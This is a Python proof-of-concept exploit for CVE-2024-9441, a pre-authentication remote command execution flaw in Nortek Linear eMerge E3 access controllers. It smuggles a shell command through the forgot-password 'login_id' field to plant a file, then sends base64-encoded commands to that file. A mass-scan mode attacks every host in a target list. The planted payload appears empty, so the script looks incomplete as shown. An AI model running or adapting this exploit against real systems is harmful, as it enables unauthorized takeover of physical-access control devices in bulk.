import argparse import base64 import requests # Function to exploit a single target def exploit(target, port, cmd): url = f"https://{target}:{port}/index.php?c=user&m=forgot_password" # Payload to create malicious PHP file PAYLOAD = {'login_id': '`echo \'\' > img/index.html`'} try: response = requests.post(url, data=PAYLOAD, verify=False, timeout=5) if response.status_code == 200: print("[+] Payload uploaded successfully.") else: print(f"[-] Failed to upload payload on {target}:{port}.") return cmd_encoded = base64.b64encode(cmd.encode()).decode() exec_url = f"https://{target}:{port}/img/index.html" exec_payload = {'c': cmd_encoded} response = requests.post(exec_url, data=exec_payload, verify=False, timeout=5) if response.status_code == 200: print(f"[+] Command executed on {target}:{port}:") print(response.text) else: print(f"[-] Exploit failed on {target}:{port}.") except Exception as e: print(f"[-] Error with {target}:{port}: {e}") # Function to perform mass scanning using a list of targets def mass_scan(targets_file, cmd): with open(targets_file, 'r') as file: for line in file: target, port = line.strip().split(':') exploit(target, port, cmd) def main(): parser = argparse.ArgumentParser(description="Nortek Linear eMerge E3 Pre-Auth RCE PoC (CVE-2024-9441)") parser.add_argument('--ip', help="Target IP address", type=str) parser.add_argument('--port', help="Target port", type=int, default=443) parser.add_argument('--cmd', help="Command to execute", type=str, default="/bin/ls -al /spider/web") parser.add_argument('--list', help="File containing list of targets (IP:port)", type=str) args = parser.parse_args() if args.list: mass_scan(args.list, args.cmd) elif args.ip: exploit(args.ip, args.port, args.cmd) else: print("[-] Please provide either a single target (--ip) or a list of targets (--list).") if __name__ == "__main__": main()